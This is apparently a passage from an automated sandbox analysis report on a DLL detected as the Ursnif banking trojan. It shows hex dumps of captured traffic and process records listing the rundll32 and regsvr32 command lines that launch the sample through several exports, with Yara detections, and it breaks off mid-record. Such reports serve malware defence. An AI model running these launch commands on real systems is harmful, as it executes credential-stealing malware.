d9 af e7 b0 e7 ac 20 b9 ea 33 14 30 03 bb 9a 6d 7f c8 f9 4f 7a 97 d4 51 61 c6 56 4c d0 ce ca c5 dc be d5 dc 3c 46 dc 1d a8 7c 81 43 c0 17 c5 f5 60 53 88 61 01 ed 7a e7 53 97 3e 50 13 3f 0f 8c 80 1b 76 ef bd 22 a5
                                        Data Ascii: i82\eT9iFOIzmCZQ%{GE2O*"YJ*06Aed(u7(VP!~?PxY@SxTzFD%fQXG+Cn, 30mOzQaVL<F|C`SazS>P?v"
                                        2021-09-10 09:33:46 UTC184INData Raw: e0 91 b5 8c 91 cf e2 e9 89 d9 28 06 ff 00 e9 24 13 e4 75 25 ac 39 21 46 ac 58 6e 1c e6 79 57 ce 22 99 58 cb e0 14 39 1a d3 41 6d ea cf 78 65 63 61 cc b8 78 8f b7 15 b2 4c 52 48 92 ee 1b 5b 1a 25 fb 69 a1 7e 06 e9 a1 28 e0 c7 fb b6 95 26 fa aa 9e 14 54 ce e1 45 ce a1 98 d3 cc f9 65 0f cb 04 a1 94 00 c3 6d de b9 e9 a0 cc c6 d0 9d 66 c5 d5 b1 f0 e2 1d 8f b2 cb 85 a3 ae e2 f6 e3 c7 8d 15 c3 1b a2 c3 73 0f 8a 1f c7 56 52 cb a6 5b 96 a0 43 de e7 3d fc a1 39 ce 92 4b 50 28 0f 7a fb 5f 66 80 9d 1c 47 97 e9 a4 8a 08 8a 98 23 0c 66 de 48 ed 08 a4 c7 2c 7c 00 50 8d c0 9f 85 37 c8 1d 31 2f c1 38 cb 55 43 31 a5 4e 9b 56 e7 ab 40 56 91 31 04 87 0c 9a b6 45 ff 00 62 bf dc 32 f4 bd 7a 1d 5b 48 d1 06 44 82 17 86 37 d2 33 f2 4b 53 6d c4 60 23 99 80 a7 da 52 5b de d6 08 f1
                                        Data Ascii: ($u%9!FXnyW"X9AmxecaxLRH[%i~(&TEemfsVR[C=9KP(z_fG#fH,|P71/8UC1NV@V1Eb2z[HD73KSm`#R[
                                        2021-09-10 09:33:46 UTC186INData Raw: 62 f1 ac cd 67 85 8e 51 db 3b 08 34 ca ca 85 85 78 1c 9e 4d 75 e4 2f 12 8e 1d 2b 9d 41 be 7b 75 cc 08 e2 c1 09 65 7f 20 7a 0e fd cf 91 8f a5 55 17 32 08 0a a6 fd 73 4a 93 09 05 fe 99 c9 ed bc f1 b3 16 34 19 64 c7 20 0f cb 0e 7c 0e 85 35 4c 4b be 43 d0 9a da b0 69 48 c4 82 c4 0b 33 f9 8f 53 f8 83 1d 3b 1e 5c 8d 3b 23 1e 45 58 be f3 4c ce 8e 02 4e e5 19 11 33 37 2b 5c 78 aa a2 7e 3a 4c ad 26 61 b8 74 a9 22 d7 14 ed b3 87 65 82 94 b3 3b 37 2a 7c ed ad 72 8f 31 c3 f7 ba 7e 21 98 a0 95 21 86 66 90 2e e0 86 12 1f 9f 1b 40 28 47 e7 8f 17 d5 6a 54 53 3a 62 0a 9e 84 8c 39 d4 e6 7d de bb 52 2c 8a 01 e1 c4 ca 31 0c 06 75 7b 8b 5b 78 5f fd 57 d2 d8 ea 39 ab 84 c8 b8 f9 78 b8 59 c8 ac 02 a1 6c 9c 6b 90 86 6f 87 96 30 58 f3 b8 13 60 75 a3 fa 64 e7 61 98 cb 4b 50 fa 3d
                                        Data Ascii: bgQ;4xMu/+A{ue zU2sJ4d |5LKCiH3S;\;#EXLN37+\x~:L&at"e;7*|r1~!!f.@(GjTS:b9}R,1u{[x_W9xYlko0X`udaKP=
                                        2021-09-10 09:33:46 UTC187INData Raw: 9d ac 1c b1 b2 c0 9d 8a 0d 8f 92 84 c2 92 4a 40 2e 34 d7 f1 b4 32 b9 09 52 13 89 24 db 2f 2f 33 53 eb 1a cb ec c7 9d a6 ac 87 52 8d b9 58 90 17 9e d0 50 2c 3d 91 b8 a8 02 f6 db 1a e7 a5 d4 09 14 82 4d 93 89 b0 50 e1 66 57 a5 1b f2 fc e2 1d d9 66 de fb d4 c8 84 5a 48 0e d9 0f c8 6f 01 02 f8 3e 2c 1f 1d 0c a0 80 4b 8e cc 2a a4 99 64 25 44 28 e4 52 43 76 33 11 94 e7 c7 ed dc 12 24 44 05 c2 f0 d2 c8 06 c5 0a 1b 80 3c 73 e4 f1 d0 94 c5 4c 41 7d 9b 9e bf 8f 68 28 90 b6 77 4d 79 fe 28 de ed b4 6b c3 90 ad 10 72 aa c5 da d8 58 dd 19 05 bc 58 f6 f8 3f ef fc 0e bb 85 3a 5f af ef 9c 09 7e 02 c4 87 da b4 fc 76 62 27 36 7d b6 ce 14 42 a0 b0 db 22 aa 87 23 8b 27 f0 6a cf fa f5 10 9c 05 d2 c0 69 6e 9f 88 0a 91 42 c6 f9 0c 88 76 b3 9a 1a 53 e2 07 db 37 1e cb 97 85 d0 31
                                        Data Ascii: J@.42R$//3SRXP,=MPfWfZHo>,K*d%D(RCv3$D<sLA}h(wMy(krXX?:_~vb'6}B"#'jinBvS71
                                        2021-09-10 09:33:46 UTC188INData Raw: 48 4a 48 2e 6a 46 86 da f5 e6 d0 29 28 c3 8d 4a 0f 8a b4 ab 0a b5 d9 ba 73 30 17 e9 fd 2d 63 f5 67 ac 63 31 c8 22 9b d3 d9 59 85 67 49 63 6e f4 ac 32 9b b6 ef 6b 71 31 45 75 e3 e0 fc 8e a5 c4 3a e4 4a 52 48 04 10 92 f5 7a 17 0f 9d 9d d8 e5 91 8e c9 48 54 f5 30 64 e1 76 55 dc 1c 9b 36 39 b8 b4 65 d6 b4 f8 f5 0d 63 4a 8a 45 0d 1e 5e 0c e8 02 8b 3b e5 85 24 2e 11 00 0d b7 6d 1b 35 46 cf 27 a2 f0 aa 98 d4 b3 31 6d 76 e7 9c 7b 8b c2 0d 39 7b 3b f7 93 44 e7 ad 35 59 63 d3 7e 9f 6a 38 58 ae 71 a1 f4 ee 38 d5 32 59 cb 15 93 33 22 47 cc 56 00 5b c9 2b cd 23 b9 71 e1 57 c9 eb c2 51 33 09 5a 81 15 a5 ce 47 4a d9 cd cb 86 6a bc 0d 33 82 10 05 58 d2 95 d7 b2 62 07 48 f4 fa cd 87 ea 18 3e dc a0 38 59 59 b1 db 80 08 82 68 a5 8e 48 c3 54 46 55 8d 0b 01 7d cd 84 ad f0 3a
                                        Data Ascii: HJH.jF)(Js0-cgc1"YgIcn2kq1Eu:JRHzHT0dvU69ecJE^;$.m5F'1mv{9{;D5Yc~j8Xq82Y3"GV[+#qWQ3ZGJj3XbH>8YYhHTFU}:
                                        2021-09-10 09:33:46 UTC189INData Raw: 00 ee 3c 8e 00 eb a8 47 fc 84 bf 80 a8 39 d1 b2 1b 72 bf 48 5a 7a ca 90 90 f5 42 14 08 ea 39 77 e7 15 27 d0 d3 ce 9e b0 f5 ae 66 a0 d2 d4 99 e9 12 d1 f6 47 dd 94 08 9c b7 96 f8 1b 4d 07 37 cf cf 5a 75 ca 2a 12 3e da 5c 78 4e 94 a9 22 a7 2a 53 f0 5b 2d 2f 12 0c e3 b9 0e 4f 23 9d 7d 2b 6d a2 33 17 52 7c 94 fa 90 a6 3f ba 8f 22 58 22 91 5d 01 ee 34 b9 27 19 5d 49 a2 22 4f 69 61 5e d3 c8 fc f4 ca e5 84 84 e4 a0 1d b5 36 a9 0f e7 5d 0d 2f 04 4d 24 aa c5 f4 e7 43 95 77 07 20 c2 ad 0f e9 e0 fb 9f a4 7e 90 58 ca ee 87 47 d5 b0 56 32 c2 c4 ab 2e eb 23 f0 7c 2d 1a 1c dd 75 8e 13 d5 2b ea 0a 41 4d d4 70 d9 8f 7b b5 fc b5 88 97 f7 38 34 b2 98 e8 2c d7 a3 6a e3 a4 57 2d 61 9e 1c 9f 48 e1 e1 21 51 95 24 4f 2b a9 27 66 4c 40 34 b1 b0 07 85 75 52 7e 78 e3 f8 eb 41 c3 14
                                        Data Ascii: <G9rHZzB9w'fGM7Zu*>\xN"*S[-/O#}+m3R|?"X"]4']I"Oia^6]/M$Cw ~XGV2.#|-u+AMp{84,jW-aH!Q$O+'fL@4uR~xA
                                        2021-09-10 09:33:46 UTC191INData Raw: 66 23 74 8a 78 b1 b9 43 06 11 aa 5d f8 5f d4 6f 1b 05 72 6f ae a5 09 49 25 81 24 5e d5 b3 e7 f3 72 cd 17 89 9a e8 c3 85 e9 b0 a1 cc 9c b6 0d d4 43 0f 49 99 5f bb 2e f2 cc 36 ad 50 ed 86 2a 14 ec 52 4e c5 1b 40 51 64 9b be 0d f5 dd 2a 3e 4f 5f d4 01 86 9e 75 83 1c 04 89 80 95 9f 64 b1 82 d1 87 56 91 2c 8a 34 8b fb 79 36 6a b9 f9 ea 4c 82 9a 9a dc 06 cc 58 58 ff 00 51 29 93 7c 00 03 40 c0 b9 a3 8a 1d 29 46 68 31 d2 b5 34 21 dc 4e ae b0 2f ea 05 3b 19 e2 46 40 7b 41 cd 89 0d 9f f4 14 3a 9c 9c ce 4e ef 42 18 33 f4 19 f5 2c 2b 0b cf 92 00 0a 34 c4 c0 6e f5 bf 4c fc c8 86 9e 0c a3 50 8d 8c 6f 06 3a 4d 84 f0 47 24 4a 64 9b 0e 31 3a 4b 3e 46 c0 ea 1e 63 12 f6 44 96 0a 17 b1 f9 ea c2 49 13 10 54 92 e0 12 09 d3 be c4 55 2f c2 bc 27 f9 50 e1 7b 81 7b 53 4d 7c a3 36
                                        Data Ascii: f#txC]_oroI%$^rCI_.6P*RN@Qd*>O_udV,4y6jLXXQ)|@)Fh14!N/;F@{A:NB3,+4nLPo:MG$Jd1:K>FcDITU/'P{{SM|6
                                        2021-09-10 09:33:46 UTC192INData Raw: ed 05 b2 c4 43 7c 2b 2e 26 0c 6c c2 34 ef 65 24 6b 3c a0 b7 04 a4 22 95 aa c1 b1 d6 ae 59 1f 75 22 ec fb e6 3a fc d6 32 13 94 4f 89 41 99 47 a9 63 93 6d fb 8d 3f 43 46 9a 76 26 50 85 03 cd 9b 19 fb 86 53 64 92 01 0c 8e 3d c5 63 5a 0c 3c 1b bf 3e 3d c6 1c 4c 3f c4 0b de c5 d8 65 99 e7 78 f7 d3 92 0a e6 63 ff 00 23 e1 b3 9e 5d 3f 23 58 b5 1e 96 c5 87 03 07 5a c9 2f 24 b0 a6 83 85 8b 28 85 f8 11 77 22 92 54 11 0a 0c ec 58 2d 9e 5e eb c7 3d 66 56 8c 4b 5e 22 cd 88 87 7b 07 66 67 15 a4 6a 64 1c 0d 84 68 1e c0 97 cf 99 a5 2d b4 11 7a fd e1 c8 f4 ae 3e 7b 4a 02 64 66 e9 c6 3f 96 9a 49 93 67 db 85 a2 09 bf d3 62 2a a8 5f 22 fa 5f e9 e1 42 64 c2 68 14 48 15 ff 00 e2 df 22 0d f5 39 aa 32 90 c9 fe 2c 09 d2 94 cf fa e8 c4 6b e9 f6 4a 45 0e 16 54 f1 2a c3 0e af 88 98
                                        Data Ascii: C|+.&l4e$k<"Yu":2OAGcm?CFv&PSd=cZ<>=L?exc#]?#XZ/$(w"TX-^=fVK^"{fgjdh-z>{Jdf?Igb*_"_BdhH"92,kJET*


                                        Code Manipulations

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        Analysis Process: loaddll32.exe PID: 2880 Parent PID: 5176

                                        General

                                        Start time:11:33:26
                                        Start date:10/09/2021
                                        Path:C:\Windows\System32\loaddll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:loaddll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll'
                                        Imagebase:0xc80000
                                        File size:116736 bytes
                                        MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.391622099.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.391468389.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.391668872.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.391496685.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.391695930.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.391358945.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.525372552.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.391423871.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.391520743.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 3428 Parent PID: 2880

                                        General

                                        Start time:11:33:27
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll',#1
                                        Imagebase:0x150000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: regsvr32.exe PID: 3556 Parent PID: 2880

                                        General

                                        Start time:11:33:27
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                        Wow64 process (32bit):true
                                        Commandline:regsvr32.exe /s C:\Users\user\Desktop\MGrYFpGLQ7.dll
                                        Imagebase:0xc40000
                                        File size:20992 bytes
                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.311865061.0000000005538000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.311769510.0000000005538000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.311540194.0000000005538000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.311670564.0000000005538000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.311984449.0000000005538000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.312268208.0000000005538000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.311633818.0000000005538000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.311573394.0000000005538000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.527384744.0000000005538000.00000004.00000040.sdmp, Author: Joe Security
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 5040 Parent PID: 3428

                                        General

                                        Start time:11:33:27
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll',#1
                                        Imagebase:0xba0000
                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.313451317.0000000004C88000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.314268795.0000000004C88000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.313872965.0000000004C88000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.314181933.0000000004C88000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.313395188.0000000004C88000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.526965041.0000000004C88000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.313701626.0000000004C88000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.313576458.0000000004C88000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.314078107.0000000004C88000.00000004.00000040.sdmp, Author: Joe Security
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: iexplore.exe PID: 4728 Parent PID: 2880

                                        General

                                        Start time:11:33:28
                                        Start date:10/09/2021
                                        Path:C:\Program Files\internet explorer\iexplore.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                        Imagebase:0x7ff648b30000
                                        File size:823560 bytes
                                        MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 2624 Parent PID: 2880

                                        General

                                        Start time:11:33:28
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Bighearted
                                        Imagebase:0xba0000
                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000002.311422020.0000000006CB8000.00000004.00000040.sdmp, Author: Joe Security
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: iexplore.exe PID: 2576 Parent PID: 4728

                                        General

                                        Start time:11:33:29
                                        Start date:10/09/2021
                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17410 /prefetch:2
                                        Imagebase:0xe90000
                                        File size:822536 bytes
                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 5352 Parent PID: 2880

                                        General

                                        Start time:11:33:32
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Soaking
                                        Imagebase:0xba0000
                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.311090164.00000000070D8000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.311152381.00000000070D8000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.311345831.00000000070D8000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.311203958.00000000070D8000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.311364814.00000000070D8000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.311042721.00000000070D8000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.311282599.00000000070D8000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.310694636.00000000070D8000.00000004.00000040.sdmp, Author: Joe Security

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 6276 Parent PID: 2880

                                        General

                                        Start time:11:33:36
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Turnipy
                                        Imagebase:0xba0000
                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000C.00000002.328237107.0000000005588000.00000004.00000040.sdmp, Author: Joe Security

                                        Chronological Activities

                                        Analysis Process: iexplore.exe PID: 6320 Parent PID: 4728

                                        General

                                        Start time:11:33:36
                                        Start date:10/09/2021
                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82952 /prefetch:2
                                        Imagebase:0xe90000
                                        File size:822536 bytes
                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: iexplore.exe PID: 6424 Parent PID: 4728

                                        General

                                        Start time:11:33:38
                                        Start date:10/09/2021
                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17414 /prefetch:2
                                        Imagebase:0xe90000
                                        File size:822536 bytes
                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: iexplore.exe PID: 6432 Parent PID: 4728

                                        General

                                        Start time:11:33:38
                                        Start date:10/09/2021
                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82954 /prefetch:2
                                        Imagebase:0xe90000
                                        File size:822536 bytes
                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 6536 Parent PID: 2880

                                        General

                                        Start time:11:33:40
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Watertight
                                        Imagebase:0xba0000
                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000010.00000003.314377890.0000000006878000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000010.00000003.314521084.0000000006878000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000010.00000003.314475815.0000000006878000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000010.00000003.314245766.0000000006878000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000010.00000003.314318653.0000000006878000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000010.00000003.313929901.0000000006878000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000010.00000003.314563024.0000000006878000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000010.00000003.314146839.0000000006878000.00000004.00000040.sdmp, Author: Joe Security

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 6708 Parent PID: 2880

                                        General

                                        Start time:11:33:44
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Dithery
                                        Imagebase:0xba0000
                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000002.346412042.0000000006C48000.00000004.00000040.sdmp, Author: Joe Security

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 7000 Parent PID: 2880

                                        General

                                        Start time:11:33:48
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Anhimae
                                        Imagebase:0xba0000
                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.355232631.0000000007528000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.355592572.0000000007528000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.355040596.0000000007528000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.355268021.0000000007528000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.355464241.0000000007528000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.355144752.0000000007528000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.354973566.0000000007528000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.355518422.0000000007528000.00000004.00000040.sdmp, Author: Joe Security

                                        Chronological Activities

                                        Analysis Process: iexplore.exe PID: 7140 Parent PID: 4728

                                        General

                                        Start time:11:33:50
                                        Start date:10/09/2021
                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82976 /prefetch:2
                                        Imagebase:0xe90000
                                        File size:822536 bytes
                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 1496 Parent PID: 2880

                                        General

                                        Start time:11:33:52
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Anostraca
                                        Imagebase:0xba0000
